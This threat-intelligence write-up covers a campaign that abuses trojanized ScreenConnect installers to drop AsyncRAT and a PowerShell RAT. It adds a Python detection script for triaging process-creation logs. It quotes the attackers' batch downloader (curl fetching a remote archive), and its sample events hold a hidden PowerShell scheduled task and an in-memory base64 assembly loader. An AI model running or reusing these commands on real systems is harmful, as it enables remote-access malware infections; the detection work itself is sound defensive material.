A sophisticated cyber campaign has emerged targeting U.S.-based organizations through trojanized ConnectWise ScreenConnect installers, marking a significant evolution in remote monitoring and management (RMM) tool abuse.
Since March 2025, these attacks have demonstrated increased frequency and technical sophistication, leveraging legitimate administrative software to establish persistent footholds within corporate networks.
The campaign employs deceptive social engineering tactics, distributing malicious installers disguised as official documents such as “agreement_support-pdf[.]Client[.]exe” and “Social_Security_Statement_Documents_386267[.]exe.”
These files appear to be legitimate support materials or financial documents, exploiting user trust to gain initial system access.
Once executed, the installers establish connections to attacker-controlled servers, effectively turning victims’ machines into remotely accessible assets.
What distinguishes this campaign from previous ScreenConnect abuse is the deployment of ClickOnce runner installers rather than traditional full installers.
Acronis researchers identified that these installers carry no embedded configuration; the client retrieves its components and settings, including the relay host it will report to, at runtime from infrastructure the attackers control.
Because the relay configuration is no longer present in the binary, static analysis that looks for a suspicious embedded relay host or port finds nothing, and detection has to shift to the runtime behaviour of the client instead.
The threat actors demonstrate remarkable operational complexity by simultaneously deploying multiple remote access trojans (RATs) on compromised systems.
Within minutes of ScreenConnect installation, automated processes deploy both the well-documented AsyncRAT and a custom PowerShell-based RAT developed specifically for these campaigns.
This dual-deployment strategy suggests either redundancy planning or shared infrastructure among multiple threat groups.
Advanced Infection Chain Analysis
The technical sophistication of this campaign becomes apparent through examination of its multi-stage infection process.
The initial ClickOnce installer connects to attacker infrastructure using parameters such as "e=Support&y=Guest&h=morco[.]rovider[.]net&p=8041" (session type, participant role, relay host and relay port), establishing communication with command-and-control servers hosted on compromised virtual private servers.
Following successful installation, the malware leverages ScreenConnect’s built-in automation capabilities to execute a batch file designated as “BypaasaUpdate[.]bat.”
This initial payload functions as a downloader, retrieving a compressed archive containing multiple encoded components (the URL is kept defanged as in the report):
REM Downloader stage run through ScreenConnect automation
set LINK=https[:]//guilloton[.]fr/x[.]zip
set ZIP_PATH=%ProgramData%\ali[.]zip
REM Fetch the archive silently and write it under ProgramData
curl -s -o "%ZIP_PATH%" %LINK%
The downloaded archive contains strategically named files including “1[.]txt” (containing AsyncRAT), “pe[.]txt” (AMSI bypass mechanisms), and “Skype[.]ps1” (PowerShell execution script).
This naming convention represents deliberate obfuscation designed to evade signature-based detection systems.
The persistence mechanism is simple but effective: a scheduled task re-runs the loader every minute, and a mutex check inside the loader prevents a second instance from starting while one is already running.
The PowerShell script “Skype[.]ps1” loads encoded .NET assemblies directly into memory, bypassing traditional file-based detection methods while maintaining continuous system access for threat actors.
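The chain described above (a ScreenConnect client pointed at an unlisted relay, the client's automation spawning a batch downloader, a one-minute scheduled task, and PowerShell loading a base64-decoded assembly) leaves a recognisable trail in process-creation telemetry. The following is an added example of triage logic over such telemetry; it is not Acronis's code. The events are constructed, the log field names (image, parent_image, cmdline) and the allowlisted relay name relay.corp.example are assumptions, and the relay host in the sample is a placeholder rather than the domain from the report.

```python
"""Added example: triage of process-creation events for the ScreenConnect abuse chain.
Not Acronis's code; sample events are constructed and the log schema is assumed."""
import re
from urllib.parse import parse_qs

# ScreenConnect relay parameters as they appear in the report's example:
# e = session type, y = participant role, h = relay host, p = relay port.
RELAY_RE = re.compile(r"\?(e=[^\s\"'&]+&y=[^\s\"'&]+&h=[^\s\"'&]+&p=\d+)")

# Assumed allowlist of the organisation's own relay hosts (hypothetical name).
KNOWN_RELAYS = {"relay.corp.example"}

SC_CLIENT = re.compile(r"screenconnect\.(windowsclient|clientsetup|client)\.exe$", re.I)


def parse_relay(cmdline):
    """Return {'type','role','host','port'} from a ScreenConnect command line, or None."""
    m = RELAY_RE.search(cmdline)
    if not m:
        return None
    q = parse_qs(m.group(1))
    return {
        "type": q.get("e", [""])[0],
        "role": q.get("y", [""])[0],
        "host": q.get("h", [""])[0].lower(),
        "port": int(q.get("p", ["0"])[0]),
    }


def rule_unknown_relay(ev):
    """A ScreenConnect client whose relay host is not one of ours (runtime-fetched config)."""
    if not SC_CLIENT.search(ev["image"]):
        return None
    relay = parse_relay(ev["cmdline"])
    if relay and relay["host"] not in KNOWN_RELAYS:
        return f"client pointed at unlisted relay {relay['host']}:{relay['port']} (role {relay['role']})"
    return None


def rule_client_spawns_downloader(ev):
    """ScreenConnect automation running a .bat or curl, as with BypaasaUpdate.bat."""
    if not SC_CLIENT.search(ev["parent_image"]):
        return None
    cl = ev["cmdline"].lower()
    if ev["image"].lower().endswith(("cmd.exe", "curl.exe")) and (".bat" in cl or "curl" in cl):
        return "ScreenConnect client spawned a script/downloader: " + ev["cmdline"]
    return None


def rule_minute_task(ev):
    """schtasks /create with a one-minute repeat, the persistence described in the report."""
    cl = ev["cmdline"].lower()
    if ev["image"].lower().endswith("schtasks.exe") and "/create" in cl \
            and re.search(r"/sc\s+minute\b.*?/mo\s+1\b", cl):
        return "scheduled task re-running every minute: " + ev["cmdline"]
    return None


def rule_inmemory_assembly(ev):
    """PowerShell decoding base64 and handing the bytes to Assembly::Load (no file on disk)."""
    cl = ev["cmdline"]
    if ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")) \
            and "FromBase64String" in cl and re.search(r"Assembly\]::Load\b", cl):
        return "PowerShell loading a base64-decoded .NET assembly in memory"
    return None


RULES = [rule_unknown_relay, rule_client_spawns_downloader, rule_minute_task, rule_inmemory_assembly]


def triage(events):
    """Run every rule over every event; return a list of (event_index, rule_name, message)."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((i, rule.__name__, msg))
    return hits


# Constructed sample events (paths, task name and relay host are placeholders).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\u\AppData\Local\Apps\2.0\ScreenConnect.WindowsClient.exe",
     "parent_image": r"C:\Windows\System32\dfsvc.exe",
     "cmdline": r'"ScreenConnect.WindowsClient.exe" "?e=Support&y=Guest&h=relay.attacker.example&p=8041"'},
    {"image": r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.WindowsClient.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r'"ScreenConnect.WindowsClient.exe" "?e=Access&y=Guest&h=relay.corp.example&p=8041"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Apps\2.0\ScreenConnect.WindowsClient.exe",
     "cmdline": r'cmd.exe /c "C:\ProgramData\BypaasaUpdate.bat"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /sc minute /mo 1 /tn "Update" /tr "powershell -w hidden -f C:\ProgramData\Skype.ps1"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'powershell -w hidden -c "[Reflection.Assembly]::Load([Convert]::FromBase64String((Get-Content C:\ProgramData\1.txt)))"'},
]

if __name__ == "__main__":
    for idx, name, msg in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {msg}")
```

The relay allowlist is the rule that matters most here: an installer that carries no embedded configuration still has to name its relay at runtime, and on a managed estate every legitimate ScreenConnect client points at a small, known set of hosts. The other three rules are individually noisy on administrative hosts and are best weighted together, as the report's chain shows them occurring within minutes of each other.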
This campaign represents a concerning evolution in RMM tool weaponization, combining legitimate software abuse with sophisticated evasion techniques to establish persistent organizational access.